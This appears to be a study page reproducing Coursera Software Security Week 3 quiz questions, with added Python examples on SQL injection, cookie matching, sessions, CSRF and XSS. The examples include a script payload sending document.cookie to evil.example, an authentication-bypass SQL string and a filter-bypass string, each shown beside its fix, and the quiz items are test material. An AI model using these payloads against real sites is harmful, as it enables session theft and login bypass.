Coursera Answers

Software Security Week 3 Quiz Answer


In this article I am going to share the Coursera course Software Security Week 3 quiz answers with you.

Week 3 Quiz


Question 1)
What is one difference between an HTTP GET and an HTTP POST request?
  • Only GET requests use the REFERER header
  • Only GET requests are subject to the same-origin policy
  • Only POST requests can encode parameters in the URL
  • Only POST requests may include parameter data in the request body


Question 2)
Which of the following is true about static and dynamic web content?
  • Static content may be re-generated with each request
  • Static pages may include PHP programs, which execute at the browser
  • The server often produces dynamic content based on the contents of the database
  • Javascript programs embedded in HTML pages are run server-side to produce dynamic content


Question 3)
SQL injection exploits a bug in what interaction of a web application?
  • Client to server
  • Network to server
  • Server to client
  • Server to database


Question 4)
SQL injection often allows an attacker to do which of the following?
  • Access information he shouldn’t
  • Overrun a buffer to smash the stack
  • Cause memory to be used after it’s freed
  • All of the above


Question 5)
If you had to summarize the key (most specific) programming failure with SQL injection, it would be:
  • Confusing data with code
  • Bypassing authentication
  • Trusting without verifying
  • Circumventing the same origin policy


Question 6)
What is escaping an example of?
  • Checking
  • Whitelisting
  • Blacklisting
  • Sanitization


Question 7)
Suppose a web application implements authentication by constructing an SQL query from HTML form data using PHP's prepared statements. What would happen if an attacker entered FRANK' OR 1=1; -- in the web form's user field?
  • The application will try to authenticate a user whose name is FRANK' OR 1=1; --
  • The text will modify the structure of the SQL query and possibly bypass authentication
  • The text will be confused as the password and authentication will probably fail
  • The text will corrupt the query structure and the database will view it as a syntax error
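
Questions 3 to 7 all turn on the same point: with string concatenation the user's input becomes part of the SQL text, while with a prepared statement the query structure is fixed before the values are bound. The following is an added example (Python with the standard sqlite3 module, not code from the Coursera course or the quiz); the users table, the 'alice' account and the function names are constructed for the demonstration, and the injection string is the one from Question 7.

```python
import sqlite3

# Added example: a login check built by string concatenation beside the same
# check using a prepared (parameterized) statement. The table, the 'alice'
# account and the function names are constructed for this demonstration.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

def build_concatenated_query(name, password):
    # The input is pasted into the SQL text, so a quote character in the input
    # changes the structure of the statement: data is confused with code.
    return ("SELECT name FROM users WHERE name = '" + name +
            "' AND password = '" + password + "'")

def login_concatenated(conn, name, password):
    row = conn.execute(build_concatenated_query(name, password)).fetchone()
    return row[0] if row else None

def login_prepared(conn, name, password):
    # The SQL structure is fixed first and the values are bound afterwards, so
    # the input can only ever be compared as a string, never parsed as SQL.
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] if row else None

PAYLOAD = "FRANK' OR 1=1; --"   # the injection string from Question 7

def demo():
    """Run the three cases and return who (if anyone) was authenticated."""
    conn = make_db()
    return {
        "legit_prepared": login_prepared(conn, "alice", "s3cret"),
        # 'OR 1=1' makes the WHERE clause true for every row and '--' comments
        # out the password check, so the first user in the table is returned.
        "injected_concatenated": login_concatenated(conn, PAYLOAD, "anything"),
        # The same text is looked up literally as a user name and finds nothing.
        "injected_prepared": login_prepared(conn, PAYLOAD, "anything"),
    }

if __name__ == "__main__":
    print(build_concatenated_query(PAYLOAD, "anything"))
    print(demo())
```

Printing the concatenated query shows the structural change directly: `SELECT name FROM users WHERE name = 'FRANK' OR 1=1; --' AND password = 'anything'`. The prepared version never produces such a string because the quote in the input is bound as data.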


Question 8)
Why is it undesirable to implement session identifiers using (only) hidden form fields?
  • Such fields cannot contain binary data
  • These fields are easily modified by the user
  • Such fields cannot include timeout information
  • The session ID is forgotten when the browser window is closed


Question 9)
Suppose a browser submits a GET request to URL http://www.mybank.com/accountinfo on 20 February 2015. Which of the following cookies, if already stored at the browser, would be sent with the request?
  • edition=us; expires=Wed, 18-Feb-2015; path=/; domain=.mybank.com
  • sessid=ABCDEFG; expires=Sat, 21-Feb-2015; path=/; domain=.mybank.com
  • lang=us-english; expires=Sat, 1-Aug-2015; path=/accountinfo/; domain=.fidelity.com
  • edition=us; expires=Thu, 19-Feb-2015; path=/accountinfo/prefs; domain=.mybank.com
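
Whether a stored cookie is attached to a request depends on three checks: it has not expired, its domain attribute matches the request host, and its path attribute matches the request path. The following added example (Python, not code from the course) implements those checks as RFC 6265 describes them and runs Question 9's four cookies against the quiz's request; the function names are constructed, and a date with no time is treated as midnight at the start of that day.

```python
from datetime import datetime
from urllib.parse import urlsplit

# Added example: which stored cookies a browser attaches to a request, judged
# by expiry, domain match and path match. The request and the four cookie
# lines are the ones from Question 9; the helper names are constructed.
REQUEST_URL = "http://www.mybank.com/accountinfo"
REQUEST_TIME = datetime(2015, 2, 20)
QUIZ_COOKIES = [
    "edition=us; expires=Wed, 18-Feb-2015; path=/; domain=.mybank.com",
    "sessid=ABCDEFG; expires=Sat, 21-Feb-2015; path=/; domain=.mybank.com",
    "lang=us-english; expires=Sat, 1-Aug-2015; path=/accountinfo/; domain=.fidelity.com",
    "edition=us; expires=Thu, 19-Feb-2015; path=/accountinfo/prefs; domain=.mybank.com",
]

def parse_cookie(line):
    """Split 'name=value; attr=val; ...' into a dict; attribute names lower-cased."""
    parts = [p.strip() for p in line.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip()}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip()
    return cookie

def parse_expires(text):
    """Quiz-style date 'Wed, 18-Feb-2015': drop the weekday and parse the rest."""
    date_part = text.split(",", 1)[-1].strip()
    return datetime.strptime(date_part, "%d-%b-%Y")

def domain_matches(host, cookie_domain):
    """Domain-match: the host equals the cookie domain or is a subdomain of it."""
    domain = cookie_domain.lstrip(".").lower()
    host = host.lower()
    return host == domain or host.endswith("." + domain)

def path_matches(request_path, cookie_path):
    """Path-match: equal, or the cookie path is a prefix that ends at a '/' boundary."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"

def cookies_sent(url, now, cookie_lines):
    """Names of the cookies that would accompany a request to url at time now."""
    parts = urlsplit(url)
    host, path = parts.hostname, parts.path or "/"
    sent = []
    for line in cookie_lines:
        c = parse_cookie(line)
        if "expires" in c and parse_expires(c["expires"]) <= now:
            continue                      # already expired; the browser has purged it
        if not domain_matches(host, c.get("domain", host)):
            continue                      # belongs to another site
        if not path_matches(path, c.get("path", "/")):
            continue                      # scoped to a more specific path
        sent.append(c["name"])
    return sent

def quiz_answer():
    return cookies_sent(REQUEST_URL, REQUEST_TIME, QUIZ_COOKIES)

if __name__ == "__main__":
    print(quiz_answer())
```

Note the path rule: a cookie scoped to `/accountinfo/` is not sent to `/accountinfo`, because the prefix must end at a path-segment boundary, while a cookie scoped to `/` is sent everywhere on the site.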


Question 10)
Which of the following are ways that session cookies could be stolen or forged?
  • Stealing it from the password database
  • Reading a cookie from an unencrypted web request
  • Predicting the cookie’s structure and reconstructing it
  • Copying them by keylogging


Question 11)
Which of the following are ways to reduce the impact of stolen cookies?
  • Associate the cookie with the client’s IP address
  • Giving each cookie a timeout
  • Changing a user’s cookie from session to session
  • Prevent cookies from entering the DNS cache
  • Stealing cookies from the password database
  • Associate the cookie with the server’s IP address
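
Questions 10 and 11 contrast how a session cookie can be forged (its structure is predictable) with how the damage from a stolen one is limited (timeouts, a fresh cookie each session, optionally binding to the client address). The following added example (Python, not code from the course) shows a forgeable identifier beside a small server-side session store that uses unpredictable identifiers, an idle timeout and rotation; the class, the user names, the times and the addresses are constructed.

```python
import base64
import secrets

# Added example: a forgeable session id next to a session store with random
# ids, an idle timeout, id rotation and optional client-address binding.
# Users, timestamps and addresses are constructed for the demonstration.

def predictable_session_id(username, login_day):
    # The structure is guessable: anyone who knows the user name and the date
    # can rebuild the id without ever seeing it.
    return base64.b64encode(f"{username}:{login_day}".encode()).decode()

def forge_predictable_id(username, login_day):
    # The 'attacker' needs no access to the server, only knowledge of the format.
    return predictable_session_id(username, login_day)

class SessionStore:
    def __init__(self, idle_timeout, bind_client_ip=False):
        self.idle_timeout = idle_timeout      # seconds of inactivity before expiry
        self.bind_client_ip = bind_client_ip  # optionally tie the session to an address
        self._sessions = {}                   # id -> {"user", "last_seen", "ip"}

    def create(self, user, now, client_ip=None):
        sid = secrets.token_urlsafe(32)       # 256 random bits from the OS CSPRNG
        self._sessions[sid] = {"user": user, "last_seen": now, "ip": client_ip}
        return sid

    def lookup(self, sid, now, client_ip=None):
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > self.idle_timeout:
            del self._sessions[sid]           # timed out: a stolen id stops working
            return None
        if self.bind_client_ip and entry["ip"] != client_ip:
            return None                       # presented from a different address
        entry["last_seen"] = now
        return entry["user"]

    def rotate(self, sid, now, client_ip=None):
        # Issue a fresh id (for example after login) so that an id captured
        # earlier in the session is useless afterwards.
        user = self.lookup(sid, now, client_ip)
        if user is None:
            return None
        del self._sessions[sid]
        return self.create(user, now, client_ip)

if __name__ == "__main__":
    print("forged:", forge_predictable_id("alice", "2015-02-20"))
    store = SessionStore(idle_timeout=600)
    sid = store.create("alice", now=1000)
    print("random id:", sid, "->", store.lookup(sid, now=1100))
```

Binding to the client address is the weakest of the three: users behind a NAT or on mobile networks change address mid-session, and an attacker behind the same NAT shares the address anyway, so it is a supplement to timeouts and rotation rather than a replacement.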


Question 12)
How can the REFERER field be used to defend against CSRF attacks?
  • It ensures that requests only come from authenticated users
  • It can’t be used reliably because it only works for dynamic content
  • It can be used to check that a Javascript program is from the proper origin
  • It can be used to ensure that sensitive requests are (only) initiated by interaction with a site’s own pages
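
A Referer check for CSRF works by refusing a state-changing request unless the Referer header names one of the site's own pages. The following added example (Python, not code from the course) shows the check together with the cases that a sloppy comparison gets wrong: a lookalike host, the real host placed in the userinfo part of the URL, and the real host placed in the query string. The host name, the header dictionaries and the function names are constructed.

```python
from urllib.parse import urlsplit

# Added example: a Referer-based CSRF check for state-changing requests.
# The site host and the sample request headers are constructed.
SITE_HOST = "www.mybank.com"

def referer_allows_request(headers, site_host=SITE_HOST, reject_missing=True):
    """True if the request appears to be initiated from one of the site's own pages."""
    referer = headers.get("Referer")
    if not referer:
        # Some browsers, proxies and privacy settings strip Referer. A strict
        # policy rejects such requests (and may turn away legitimate users); a
        # lenient one accepts them (and lets an attacker who can suppress the
        # header through). Either way this case must be decided explicitly.
        return not reject_missing
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https"):
        return False
    # Compare the parsed host exactly. A prefix or substring test would accept
    # www.mybank.com.evil.example or http://evil.example/?next=www.mybank.com.
    return (parts.hostname or "").lower() == site_host.lower()

SAMPLE_REQUESTS = {
    "own page":         {"Referer": "http://www.mybank.com/transfer"},
    "attacker page":    {"Referer": "http://evil.example/csrf.html"},
    "lookalike host":   {"Referer": "http://www.mybank.com.evil.example/"},
    "host in userinfo": {"Referer": "http://www.mybank.com@evil.example/"},
    "host in query":    {"Referer": "http://evil.example/?next=www.mybank.com"},
    "no referer":       {},
}

def evaluate_samples(reject_missing=True):
    """Map each constructed request to the check's verdict."""
    return {label: referer_allows_request(h, reject_missing=reject_missing)
            for label, h in SAMPLE_REQUESTS.items()}

if __name__ == "__main__":
    for label, allowed in evaluate_samples().items():
        print(f"{label:18} -> {'allow' if allowed else 'reject'}")
```

The check is only a heuristic: it depends on the browser sending the header, so a site that relies on it still needs a per-request anti-CSRF token for sensitive actions.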


Question 13)
<script></script> tags in HTML pages most often identify programs written in what language?
  • PHP
  • C
  • Java
  • Javascript


Question 14)
The browser implements security for Javascript programs for what reason?
  • Such programs could deny service by running forever
  • It doesn’t — Javascript programs run at the server so the browser can ignore them
  • Such programs may access browser-controlled resources, which include potentially sensitive data in HTML documents and cookies
  • It doesn’t — these programs are only used to render dynamic content but are otherwise not security-relevant


Question 15)
XSS subverts what policy?
  • Whitelisting
  • Same Origin
  • Availability
  • Secure defaults


Question 16)
What is the difference between stored (or persistent) XSS and reflected XSS?
  • Stored XSS embeds Javascript in a URL, while reflected XSS embeds it in a mirrored site
  • Stored XSS is amenable to blacklisting but reflected XSS is not
  • Stored XSS works by injecting code in a site’s served content, while reflected XSS injects code in a URL
  • Stored XSS works on database queries while reflected XSS works on cookies, which are received from and reflected back to the server
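
Questions 6, 15 and 16 come together in one mechanism: a script injected either through a URL parameter that the server echoes back (reflected) or through content the server stores and serves to later visitors (stored) runs in the page's origin and can read its cookies, and escaping the output is the sanitization step that stops it. The following added example (Python, not code from the course) renders a search page and a comments page both ways, shows why a blacklist of `<script>` is bypassable, and uses the standard library's `html.escape`. The payload, the comment text and the function names are constructed.

```python
import html

# Added example: reflected and stored XSS through a tiny page renderer, a
# naive blacklist that can be bypassed, and escaping as the sanitization that
# neutralizes both. The payload and the comments are constructed.
PAYLOAD = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"

def render_search_unsafe(query):
    # Reflected XSS: the query taken from the URL is copied straight into the
    # response, so a link carrying the payload runs it in the site's origin.
    return f"<p>Results for {query}</p>"

def render_search_escaped(query):
    # Escaping turns the markup characters into entities; the browser displays
    # them as text instead of parsing a script element.
    return f"<p>Results for {html.escape(query, quote=True)}</p>"

COMMENTS = []   # stands in for the database behind a comments page

def post_comment(text):
    COMMENTS.append(text)

def render_comments_unsafe():
    # Stored XSS: every later visitor receives the injected script from the server.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"

def render_comments_escaped():
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in COMMENTS) + "</ul>"

def blacklist_filter(text):
    # Blacklisting one bad token; the input below is crafted so that removing
    # the token once leaves the token behind.
    return text.replace("<script>", "")

BLACKLIST_BYPASS = "<scr<script>ipt>alert(document.cookie)</script>"

def contains_script(page):
    """Crude check used only to compare the renderers' output."""
    return "<script" in page.lower()

if __name__ == "__main__":
    print(render_search_unsafe(PAYLOAD))
    print(render_search_escaped(PAYLOAD))
    print(blacklist_filter(BLACKLIST_BYPASS))
```

`html.escape` is correct for text placed in HTML element content or a quoted attribute value; output placed inside a script block, a URL or a CSS property needs the escaping rules of that context instead, which is why escaping is done at the point of output rather than on the way into the database.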